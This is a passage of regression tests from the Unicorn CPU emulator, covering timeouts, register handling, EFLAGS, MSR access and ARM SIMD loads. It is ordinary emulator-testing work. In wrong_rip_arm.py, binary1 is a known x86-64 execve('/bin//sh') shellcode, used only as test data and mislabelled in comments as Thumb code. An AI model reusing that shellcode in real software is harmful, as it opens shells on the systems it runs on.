    ret = pthread_create(&th, NULL, posix_emu_starter, &starter_params);
    if (ret) {
        printf("Failed on pthread_create() with error returned: %u\n", ret);
        return -2;
    }

    // wait 3 seconds
    sleep(3);
#endif

    // Stop the thread after it has been let to run in the background for a while
    printf("---- Thread Stopping ----\n");
    printf("uc_emu_stop()\n");
    err = uc_emu_stop(uc);
    if (err) {
        printf("Failed on uc_emu_stop() with error returned: %u\n", err);
        return err;
    }
    test_passed_ok = true;

    // done executing, print some reg values as a test
    uc_reg_read(uc, UC_MIPS_REG_PC, &val);
    printf("pc is %X\n", val);
    uc_reg_read(uc, UC_MIPS_REG_A0, &val);
    printf("a0 is %X\n", val);

    // free resources
    printf("uc_close()\n");
    uc_close(uc);

    if (test_passed_ok)
        printf("\n\nTEST PASSED!\n\n");
    else
        printf("\n\nTEST FAILED!\n\n");
    return 0;
}
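A note on the pattern above: the fixed three-second sleep only approximates "let the emulation run for a while". A minimal alternative sketch, assuming only the public Unicorn C API and POSIX threads (the names count_hook and runner are our own, not part of the test suite): keep uc_open() in the main thread and uc_emu_start() in a worker, as the test does, but make the stop point deterministic by calling uc_emu_stop() from inside a code hook instead of from a second thread after a sleep.

#include <unicorn/unicorn.h>
#include <pthread.h>
#include <stdio.h>

static const uint64_t BASE = 0x100000;

/* the same MIPS32 little-endian infinite loop used by the test above */
static const unsigned char LOOP[] = {
    0x02, 0x00, 0x04, 0x24, /* li   $a0, 2     */
    0x00, 0x00, 0x00, 0x00, /* nop             */
    0xFE, 0xFF, 0x80, 0x14, /* bnez $a0, loop1 */
    0x00, 0x00, 0x00, 0x00, /* nop             */
};

/* counts executed instructions and stops the engine after 1000 of them */
static void count_hook(uc_engine *uc, uint64_t address, uint32_t size,
                       void *user_data)
{
    int *executed = (int *)user_data;
    if (++*executed >= 1000) {
        uc_emu_stop(uc); /* stopping from inside a hook needs no extra thread */
    }
}

/* worker thread: only runs uc_emu_start() */
static void *runner(void *arg)
{
    uc_emu_start((uc_engine *)arg, BASE, BASE + sizeof(LOOP), 0, 0);
    return NULL;
}

int main(void)
{
    uc_engine *uc;
    uc_hook hook;
    pthread_t th;
    int executed = 0;

    if (uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc) != UC_ERR_OK)
        return 1;
    uc_mem_map(uc, BASE, 0x1000, UC_PROT_ALL);
    uc_mem_write(uc, BASE, LOOP, sizeof(LOOP));
    uc_hook_add(uc, &hook, UC_HOOK_CODE, count_hook, &executed, 1, 0);

    pthread_create(&th, NULL, runner, uc);
    pthread_join(th, NULL); /* returns once count_hook stops the engine */

    printf("executed %d instructions\n", executed);
    return uc_close(uc) != UC_ERR_OK;
}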
����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/timeout_segfault.c������������������������������������������������������0000664�0000000�0000000�00000010616�14675241067�0021550�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* timeout_segfault.c This program shows a case where the emulation timer keeps running after emulation has ended. It triggers an intermittent segfault when _timeout_fn() tries to call uc_emu_stop() after emulation has already been cleaned up. This code is the same as samples/sample_arm.c, except that it adds a timeout on each call to uc_emu_start(). See issue #78 for more details: https://github.com/unicorn-engine/unicorn/issues/78 */ #include <unicorn/unicorn.h> // code to be emulated #define ARM_CODE "\x37\x00\xa0\xe3\x03\x10\x42\xe0" // mov r0, #0x37; sub r1, r2, r3 #define THUMB_CODE "\x83\xb0" // sub sp, #0xc // memory address where emulation starts #define ADDRESS 0x10000 // number of seconds to wait before timeout #define TIMEOUT 5 static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing basic block at 0x%"PRIx64 ", block size = 0x%x\n", address, size); } static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing instruction at 0x%"PRIx64 ", instruction size = 0x%x\n", address, size); } static void test_arm(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int r0 = 0x1234; // R0 register int r2 = 0x6789; // R1 register int r3 = 0x3333; // R2 register int r1; // R1 register printf("Emulate ARM code\n"); // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, ARM_CODE, sizeof(ARM_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_ARM_REG_R0, &r0); uc_reg_write(uc, UC_ARM_REG_R2, &r2); uc_reg_write(uc, UC_ARM_REG_R3, &r3); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(ARM_CODE) -1, UC_SECOND_SCALE * TIMEOUT, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. 
Below is the CPU context\n"); uc_reg_read(uc, UC_ARM_REG_R0, &r0); uc_reg_read(uc, UC_ARM_REG_R1, &r1); printf(">>> R0 = 0x%x\n", r0); printf(">>> R1 = 0x%x\n", r1); uc_close(uc); } static void test_thumb(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int sp = 0x1234; // R0 register printf("Emulate THUMB code\n"); // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM, UC_MODE_THUMB, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, THUMB_CODE, sizeof(THUMB_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_ARM_REG_SP, &sp); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(THUMB_CODE) -1, UC_SECOND_SCALE * TIMEOUT, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_ARM_REG_SP, &sp); printf(">>> SP = 0x%x\n", sp); uc_close(uc); } int main(int argc, char **argv, char **envp) { test_arm(); printf("==========================\n"); test_thumb(); return 0; } ������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/translator_buffer.py����������������������������������������������������0000775�0000000�0000000�00000004710�14675241067�0022121�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python # By Mariano Graziano from unicorn import * from unicorn.x86_const import * import regress, struct class Emulator: def __init__(self, code, stack): self.mask = 0xFFFFFFFFFFFFF000 self.unicorn_code = code self.unicorn_stack = stack self.mu = Uc(UC_ARCH_X86, UC_MODE_64) size = 1 * 4096 self.mu.mem_map(code & self.mask, size) size = 1 * 4096 self.mu.mem_map(stack & self.mask, size) self.set_hooks() def set_hooks(self): self.mu.hook_add(UC_HOOK_MEM_WRITE, self.hook_mem_access) self.mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, self.hook_mem_invalid) self.mu.hook_add(UC_HOOK_MEM_FETCH_UNMAPPED, self.hook_mem_fetch_unmapped) def hook_mem_fetch_unmapped(self, uc, access, address, size, value, user_data): next_ip = self.unicorn_code + size self.mu.reg_write(UC_X86_REG_RIP, next_ip) self.mu.mem_write(next_ip, "\x90") self.mu.reg_write(UC_X86_REG_RIP, address) return True def hook_mem_invalid(self, uc, access, address, size, value, user_data): return True def hook_mem_access(self, uc, access, address, size, value, user_data): return True def emu(self, size): ip = self.mu.reg_read(UC_X86_REG_RIP) try: self.mu.emu_start(ip, ip + size, timeout=10000, count=1) except UcError as e: print("Error %s" % e) def write_data(self, address, content): self.mu.mem_write(address, 
content)


class Init(regress.RegressTest):
    def init_unicorn(self, ip, sp, counter):
        # print("[+] Emulating IP: %x SP: %x - Counter: %x" % (ip, sp, counter))
        E = Emulator(ip, sp)
        E.write_data(ip, b"\x90")
        E.write_data(sp, self.generate_value(counter))
        E.mu.reg_write(UC_X86_REG_RSP, sp)
        E.mu.reg_write(UC_X86_REG_RIP, ip)
        E.emu(1)

    def generate_value(self, counter):
        start = 0xffff880026f02000
        offset = counter * 8
        address = start + offset
        return struct.pack("<Q", address)

    def runTest(self):
        global mu
        ips = list(range(0xffffffff816a9000, 0xffffffff816af000, 0x1))
        sps = list(range(0xffff88001b800000, 0xffff88001b801000, 0x1))
        j = 0
        for i in ips:
            j += 1
            index = ips.index(i)
            self.init_unicorn(i, sps[index], j)

if __name__ == '__main__':
    regress.main()
unicorn-2.1.1/tests/regress/vld.py0000775000000000000000000000777714675241067ustar00rootroot
#!/usr/bin/env python
# Moshe Kravchik

from __future__ import print_function
from unicorn import *
from unicorn.arm_const import *
import binascii
import regress

# code to be emulated
# enable VFP
'''
00000016 f44f0370    mov.w   r3, #0xf00000
0000001a ee013f50    mcr     p15, #0x0, r3, c1, c0, #0x2
0000bfb6 f3bf8f6f    isb     sy
0000bfba f04f4380    mov.w   r3, #0x40000000
0000bfbe eee83a10    vmsr    fpexc, r3
'''
ENABLE_VFP_CODE = b"\x4f\xf4\x70\x03\x01\xee\x50\x3f\xbf\xf3\x6f\x8f\x4f\xf0\x80\x43\xe8\xee\x10\x3a"

VLD_CODE = b"\x21\xf9\x0f\x6a"  # 0000002a f9216a0f    vld1.8 {d6, d7}, [r1]
VST_CODE = b"\x00\xf9\x0f\x6a"  # 0000002e f9006a0f    vst1.8 {d6, d7}, [r0]

# memory address where emulation starts
ADDRESS = 0x10000
SCRATCH_ADDRESS = 0x1000

class SIMDNotReadArm(regress.RegressTest):
    def runTest(self):
        code = ENABLE_VFP_CODE + VLD_CODE + VST_CODE
        print("Emulate THUMB code")
        try:
            # Initialize emulator in thumb mode
            mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB)

            # map 2MB memory for this emulation
            mu.mem_map(ADDRESS, 2 * 1024 * 1024)

            # write machine code to be emulated to memory
            mu.mem_write(ADDRESS, code)

            # map 10K scratch memory for this emulation
            mu.mem_map(SCRATCH_ADDRESS, 10 * 1024)

            # write dummy data to be emulated to memory
            mu.mem_write(SCRATCH_ADDRESS, b"\x01" * 64)

            # initialize machine registers
            for i in range(UC_ARM_REG_R0, UC_ARM_REG_R12):
                mu.reg_write(i, i - UC_ARM_REG_R0)

            mu.reg_write(UC_ARM_REG_R1, SCRATCH_ADDRESS)
            mu.reg_write(UC_ARM_REG_R0, SCRATCH_ADDRESS + 0x100)
            mu.reg_write(UC_ARM_REG_SP, 0x1234)

            # use the D6/D7 register enums themselves as sentinel values
            mu.reg_write(UC_ARM_REG_D6, UC_ARM_REG_D6)
            mu.reg_write(UC_ARM_REG_D7, UC_ARM_REG_D7)

            print(">>> Before emulation")
            print("\tD6 = 0x%x" % mu.reg_read(UC_ARM_REG_D6))
            print("\tD7 = 0x%x" % mu.reg_read(UC_ARM_REG_D7))
            for i in range(UC_ARM_REG_R0, UC_ARM_REG_R12):
                val = mu.reg_read(i)
                print("\t %s = 0x%x" % ("R" + str(i - UC_ARM_REG_R0), val))

            self.assertEqual(UC_ARM_REG_D6, mu.reg_read(UC_ARM_REG_D6))
            self.assertEqual(UC_ARM_REG_D7, mu.reg_read(UC_ARM_REG_D7))

            try:
                content = mu.mem_read(SCRATCH_ADDRESS, 100)
                print("Memory at addr 0x%X %s" % (SCRATCH_ADDRESS, binascii.hexlify(content)))
                content = mu.mem_read(SCRATCH_ADDRESS + 0x100, 100)
                print("Memory at addr 0x%X %s" % (SCRATCH_ADDRESS + 0x100, binascii.hexlify(content)))
            except Exception as errtxt:
                print(errtxt)

            # emulate machine code in infinite time
            mu.emu_start(ADDRESS, ADDRESS + len(code))

            # now print out some registers
            print(">>> Emulation done. Below is the CPU context")

            sp = mu.reg_read(UC_ARM_REG_SP)
            print(">>> SP = 0x%x" % sp)
            val = mu.reg_read(UC_ARM_REG_PC)
            print(">>> PC = 0x%x" % val)
            for i in range(UC_ARM_REG_R0, UC_ARM_REG_R12):
                val = mu.reg_read(i)
                print(">>> %s = 0x%x" % ("R" + str(i - UC_ARM_REG_R0), val))

            print("\tD6 = 0x%x" % mu.reg_read(UC_ARM_REG_D6))
            print("\tD7 = 0x%x" % mu.reg_read(UC_ARM_REG_D7))

            try:
                content = mu.mem_read(SCRATCH_ADDRESS, 100)
                print("Memory at addr 0x%X %s" % (SCRATCH_ADDRESS, binascii.hexlify(content)))
                content = mu.mem_read(SCRATCH_ADDRESS + 0x100, 100)
                print("Memory at addr 0x%X %s" % (SCRATCH_ADDRESS + 0x100, binascii.hexlify(content)))
            except Exception as errtxt:
                print(errtxt)

            self.assertEqual(mu.reg_read(UC_ARM_REG_D6), 0x0101010101010101)
            self.assertEqual(mu.reg_read(UC_ARM_REG_D7), 0x0101010101010101)

        except UcError as e:
            print("ERROR: %s" % e)

if __name__ == '__main__':
    regress.main()
unicorn-2.1.1/tests/regress/write_before_map.py0000775000000000000000000000103114675241067ustar00rootroot
#!/usr/bin/env python
from __future__ import print_function
from unicorn import *
from unicorn.x86_const import *
import regress

X86_CODE64 = b"\x90"  # NOP

class WriteBeforeMap(regress.RegressTest):
    def runTest(self):
        # Initialize emulator in X86-64bit mode
        mu = Uc(UC_ARCH_X86, UC_MODE_64)

        # memory address where emulation starts
        ADDRESS = 0x1000000

        # write machine code to be emulated to memory (before mapping it)
        mu.mem_write(ADDRESS, X86_CODE64)

if __name__ == '__main__':
    regress.main()
unicorn-2.1.1/tests/regress/wrong_rip.py0000775000000000000000000000472014675241067ustar00rootroot
#!/usr/bin/python
from unicorn import *
from unicorn.x86_const import *
import regress

binary1 = b'\xb8\x02\x00\x00\x00'  # mov eax, 2
binary2 = b'\xb8\x01\x00\x00\x00'  # mov eax, 1

class WrongRIP(regress.RegressTest):
    def test_step(self):
        mu = Uc(UC_ARCH_X86, UC_MODE_64)
        mu.mem_map(0, 2 * 1024 * 1024)
        # write machine code to be emulated to memory
        mu.mem_write(0, binary1 + binary2)
        # emu for maximum 1 instruction.
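        # Note: emu_start()'s positional arguments are begin, until, timeout
        # and count, so the trailing "0, 1" below asks for no timeout and a
        # hard cap of one executed instruction before control returns.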
mu.emu_start(0, 5, 0, 1) self.assertEqual(0x2, mu.reg_read(UC_X86_REG_RAX)) self.assertEqual(0x5, mu.reg_read(UC_X86_REG_RIP)) mu.emu_start(5, 10, 0, 1) self.assertEqual(0xa, mu.reg_read(UC_X86_REG_RIP)) self.assertEqual(0x1, mu.reg_read(UC_X86_REG_RAX)) def test_step2(self): mu = Uc(UC_ARCH_X86, UC_MODE_64) mu.mem_map(0, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(0, binary1 + binary2) # emu for maximum 1 instruction. mu.emu_start(0, 10, 0, 1) self.assertEqual(0x2, mu.reg_read(UC_X86_REG_RAX)) self.assertEqual(0x5, mu.reg_read(UC_X86_REG_RIP)) mu.emu_start(5, 10, 0, 1) self.assertEqual(0x1, mu.reg_read(UC_X86_REG_RAX)) self.assertEqual(0xa, mu.reg_read(UC_X86_REG_RIP)) def test_step3(self): bin3 = b'\x40\x01\xc1\x31\xf6' # inc eax; add ecx, eax; xor esi, esi mu = Uc(UC_ARCH_X86, UC_MODE_32) mu.mem_map(0, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(0, bin3) # emu for maximum 1 instruction. mu.emu_start(0, 10, 0, 1) self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EAX)) self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EIP)) def test_step_then_fin(self): bin4 = b'\x40\x01\xc1\x31\xf6\x90\x90\x90' # inc eax; add ecx, eax; xor esi, esi mu = Uc(UC_ARCH_X86, UC_MODE_32) mu.mem_map(0, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(0, bin4) # emu for maximum 1 instruction. mu.emu_start(0, len(binary1), 0, 1) self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EAX)) self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EIP)) # emu to the end mu.emu_start(1, len(bin4)) self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EAX)) self.assertEqual(len(bin4), mu.reg_read(UC_X86_REG_EIP)) if __name__ == '__main__': regress.main() ������������������������������������������������unicorn-2.1.1/tests/regress/wrong_rip_arm.py��������������������������������������������������������0000775�0000000�0000000�00000002065�14675241067�0021245�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.x86_const import * from unicorn.arm_const import * import regress # adds r1, #0x48 # ldrsb r7, [r7, r7] # ldrsh r7, [r2, r1] # ldr r0, [pc, #0x168] # cmp r7, #0xbf # str r7, [r5, #0x20] # ldr r1, [r5, #0x64] # strb r7, [r5, #0xc] # ldr r0, [pc, #0x1a0] binary1 = b'\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05' # binary1 = b'\x48\x31\xff\x57' #adds r1, #0x48 #ldrsb r7, [r7, r7] class WrongRIPArm(regress.RegressTest): def runTest(self): mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB) mu.mem_map(0, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(0, binary1) mu.reg_write(UC_ARM_REG_R13, 1 * 1024 * 1024) # emu for maximum 1 instruction. 
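# (In Thumb mode the first halfword of binary1, 0x3148 from "\x48\x31" in
# little-endian order, decodes as `adds r1, #0x48`; a single-step should
# therefore leave R1 == 0x48 and PC == 2, which is what is asserted below.)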
mu.emu_start(0, len(binary1), 0, 1) self.assertEqual(0x48, mu.reg_read(UC_ARM_REG_R1)) pos = mu.reg_read(UC_ARM_REG_R15) self.assertEqual(0x2, pos) if __name__ == '__main__': regress.main() ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/wrong_sp_arm.py���������������������������������������������������������0000775�0000000�0000000�00000001325�14675241067�0021073�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python # By Ryan Hileman, issue #16 from unicorn import * from unicorn.arm_const import * from unicorn.arm64_const import * import regress class WrongSPArm(regress.RegressTest): def test_32(self): with self.assertRaises(UcError): uc = Uc(UC_ARCH_ARM, UC_MODE_32) uc.reg_write(UC_ARM_REG_SP, 4) def test_64(self): uc = Uc(UC_ARCH_ARM64, UC_MODE_ARM) uc.reg_write(UC_ARM64_REG_SP, 4) self.assertEqual(0x4, uc.reg_read(UC_ARM64_REG_SP)) def test_arm(self): uc = Uc(UC_ARCH_ARM, UC_MODE_ARM) uc.reg_write(UC_ARM_REG_SP, 4) self.assertEqual(0x4, uc.reg_read(UC_ARM_REG_SP)) if __name__ == '__main__': regress.main() �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_16_segfault.c�������������������������������������������������������0000664�0000000�0000000�00000001165�14675241067�0021014�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #define BINARY "\x90" #define MEMORY_SIZE 4 * 1024 #define STARTING_ADDRESS 100 * 1024 int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(UC_ARCH_X86, UC_MODE_16, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, STARTING_ADDRESS, MEMORY_SIZE, UC_PROT_ALL); if (uc_mem_write(uc, STARTING_ADDRESS, BINARY, sizeof(BINARY) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } printf("uc_emu_start(…)\n"); uc_emu_start(uc, STARTING_ADDRESS, STARTING_ADDRESS + sizeof(BINARY) - 1, 0, 20); printf("done\n"); return 0; } 
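Like several of the regression tests in this directory, the program above prints a diagnostic but otherwise discards most return codes. A minimal hardened variant, written in the spirit of the OK() macro that x86_vex.c uses later in this test suite (the ck() helper name is our own invention, not part of the repository):

#include <unicorn/unicorn.h>
#include <stdio.h>
#include <stdlib.h>

/* abort with the Unicorn error string if any API call fails */
#define ck(stmt)                                                        \
    do {                                                                \
        uc_err _e = (stmt);                                             \
        if (_e != UC_ERR_OK) {                                          \
            fprintf(stderr, "%s failed: %s\n", #stmt, uc_strerror(_e)); \
            exit(1);                                                    \
        }                                                               \
    } while (0)

int main(void)
{
    uc_engine *uc;

    ck(uc_open(UC_ARCH_X86, UC_MODE_16, &uc));
    ck(uc_mem_map(uc, 100 * 1024, 4 * 1024, UC_PROT_ALL));
    ck(uc_mem_write(uc, 100 * 1024, "\x90", 1)); /* one NOP, as above */
    ck(uc_emu_start(uc, 100 * 1024, 100 * 1024 + 1, 0, 20));
    ck(uc_close(uc));
    return 0;
}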
�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_64_conditional_jump.py����������������������������������������������0000775�0000000�0000000�00000003114�14675241067�0022750�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python import regress import unicorn as U class WrongConditionalPath(regress.RegressTest): def test_eflags(self): # 0: 4d 31 f6 xor r14, r14 # 3: 45 85 f6 test r14d, r14d # 6: 75 fe jne 0x6 # 8: f4 hlt CODE = 'M1\xf6E\x85\xf6u\xfe\xf4' uc = U.Uc(U.UC_ARCH_X86, U.UC_MODE_64) uc.reg_write(U.x86_const.UC_X86_REG_RIP, 0x6000b0) uc.reg_write(U.x86_const.UC_X86_REG_EFLAGS, 0x246) uc.mem_map(0x600000, 0x1000) uc.mem_write(0x6000b0, CODE) uc.emu_start(0x6000b0 + 6, 0, count=1) # Here's the original execution trace for this on qemu-user. # # $ SC='xor r14,r14; test r14d, r14d; jne $; hlt' # $ asm --context amd64 --format elf $SC > example # $ qemu-x86_64-static -d cpu,in_asm -singlestep ./test \ # | grep -E 'RFL|^0x' # 0x00000000006000b0: xor %r14,%r14 # RIP=00000000006000b0 RFL=00000202 [-------] CPL=3 II=0 A20=1 SMM=0 HLT=0 # 0x00000000006000b3: test %r14d,%r14d # RIP=00000000006000b3 RFL=00000246 [---Z-P-] CPL=3 II=0 A20=1 SMM=0 HLT=0 # 0x00000000006000b6: jne 0x6000b6 # RIP=00000000006000b6 RFL=00000246 [---Z-P-] CPL=3 II=0 A20=1 SMM=0 HLT=0 # 0x00000000006000b8: hlt # RIP=00000000006000b8 RFL=00000246 [---Z-P-] CPL=3 II=0 A20=1 SMM=0 HLT=0 self.assertEqual(0x6000b0 + 8, uc.reg_read(U.x86_const.UC_X86_REG_RIP)) if __name__ == '__main__': regress.main() ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_64_eflags.py��������������������������������������������������������0000775�0000000�0000000�00000002046�14675241067�0020656�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python import regress import unicorn as U class WrongEFLAGS(regress.RegressTest): def test_eflags(self): # xor r14,r14 CODE = 'M1\xf6' uc = U.Uc(U.UC_ARCH_X86, U.UC_MODE_64) uc.reg_write(U.x86_const.UC_X86_REG_RIP, 0x6000b0) uc.reg_write(U.x86_const.UC_X86_REG_EFLAGS, 0x200) uc.mem_map(0x600000, 0x1000) uc.mem_write(0x6000b0, CODE) uc.emu_start(0x6000b0, 0, count=1) # Here's the original execution trace 
for this on actual hardware. # # (gdb) x/i $pc # => 0x6000b0: xor %r14,%r14 # (gdb) p/x $eflags # $1 = 0x200 # (gdb) p $eflags # $2 = [ IF ] # (gdb) si # 0x00000000006000b3 in ?? () # (gdb) p/x $eflags # $3 = 0x246 # (gdb) p $eflags # $4 = [ PF ZF IF ] self.assertEqual(0x6000b3, uc.reg_read(U.x86_const.UC_X86_REG_RIP)) self.assertEqual(0x246, uc.reg_read(U.x86_const.UC_X86_REG_EFLAGS)) if __name__ == '__main__': regress.main() ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_64_msr.py�����������������������������������������������������������0000775�0000000�0000000�00000010304�14675241067�0020212�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python from unicorn import * from unicorn.x86_const import * from struct import pack import regress CODE_ADDR = 0x40000 CODE_SIZE = 0x1000 SCRATCH_ADDR = 0x80000 SCRATCH_SIZE = 0x1000 SEGMENT_ADDR = 0x5000 SEGMENT_SIZE = 0x1000 FSMSR = 0xC0000100 GSMSR = 0xC0000101 def set_msr(uc, msr, value, scratch=SCRATCH_ADDR): ''' set the given model-specific register (MSR) to the given value. this will clobber some memory at the given scratch address, as it emits some code. ''' # save clobbered registers orax = uc.reg_read(UC_X86_REG_RAX) ordx = uc.reg_read(UC_X86_REG_RDX) orcx = uc.reg_read(UC_X86_REG_RCX) orip = uc.reg_read(UC_X86_REG_RIP) # x86: wrmsr buf = '\x0f\x30' uc.mem_write(scratch, buf) uc.reg_write(UC_X86_REG_RAX, value & 0xFFFFFFFF) uc.reg_write(UC_X86_REG_RDX, (value >> 32) & 0xFFFFFFFF) uc.reg_write(UC_X86_REG_RCX, msr & 0xFFFFFFFF) uc.emu_start(scratch, scratch+len(buf), count=1) # restore clobbered registers uc.reg_write(UC_X86_REG_RAX, orax) uc.reg_write(UC_X86_REG_RDX, ordx) uc.reg_write(UC_X86_REG_RCX, orcx) uc.reg_write(UC_X86_REG_RIP, orip) def get_msr(uc, msr, scratch=SCRATCH_ADDR): ''' fetch the contents of the given model-specific register (MSR). this will clobber some memory at the given scratch address, as it emits some code. ''' # save clobbered registers orax = uc.reg_read(UC_X86_REG_RAX) ordx = uc.reg_read(UC_X86_REG_RDX) orcx = uc.reg_read(UC_X86_REG_RCX) orip = uc.reg_read(UC_X86_REG_RIP) # x86: rdmsr buf = '\x0f\x32' uc.mem_write(scratch, buf) uc.reg_write(UC_X86_REG_RCX, msr & 0xFFFFFFFF) uc.emu_start(scratch, scratch+len(buf), count=1) eax = uc.reg_read(UC_X86_REG_EAX) edx = uc.reg_read(UC_X86_REG_EDX) # restore clobbered registers uc.reg_write(UC_X86_REG_RAX, orax) uc.reg_write(UC_X86_REG_RDX, ordx) uc.reg_write(UC_X86_REG_RCX, orcx) uc.reg_write(UC_X86_REG_RIP, orip) return (edx << 32) | (eax & 0xFFFFFFFF) def set_gs(uc, addr): ''' set the GS.base hidden descriptor-register field to the given address. this enables referencing the gs segment on x86-64. ''' return set_msr(uc, GSMSR, addr) def get_gs(uc): ''' fetch the GS.base hidden descriptor-register field. 
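    (GS.base is reached through the IA32_GS_BASE model-specific register,
    0xC0000101 -- the GSMSR constant defined above -- so this helper is just
    the rdmsr stub from get_msr() executed at the scratch address.)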
''' return get_msr(uc, GSMSR) def set_fs(uc, addr): ''' set the FS.base hidden descriptor-register field to the given address. this enables referencing the fs segment on x86-64. ''' return set_msr(uc, FSMSR, addr) def get_fs(uc): ''' fetch the FS.base hidden descriptor-register field. ''' return get_msr(uc, FSMSR) class TestGetSetMSR(regress.RegressTest): def test_msr(self): uc = Uc(UC_ARCH_X86, UC_MODE_64) uc.mem_map(SCRATCH_ADDR, SCRATCH_SIZE) set_msr(uc, FSMSR, 0x1000) self.assertEqual(0x1000, get_msr(uc, FSMSR)) set_msr(uc, GSMSR, 0x2000) self.assertEqual(0x2000, get_msr(uc, GSMSR)) def test_gs(self): uc = Uc(UC_ARCH_X86, UC_MODE_64) uc.mem_map(SEGMENT_ADDR, SEGMENT_SIZE) uc.mem_map(CODE_ADDR, CODE_SIZE) uc.mem_map(SCRATCH_ADDR, SCRATCH_SIZE) code = '6548330C2518000000'.decode('hex') # x86-64: xor rcx, qword ptr gs:[0x18] uc.mem_write(CODE_ADDR, code) uc.mem_write(SEGMENT_ADDR+0x18, 'AAAAAAAA') set_gs(uc, SEGMENT_ADDR) self.assertEqual(SEGMENT_ADDR, get_gs(uc)) uc.emu_start(CODE_ADDR, CODE_ADDR+len(code)) self.assertEqual(uc.reg_read(UC_X86_REG_RCX), 0x4141414141414141) def test_fs(self): uc = Uc(UC_ARCH_X86, UC_MODE_64) uc.mem_map(SEGMENT_ADDR, SEGMENT_SIZE) uc.mem_map(CODE_ADDR, 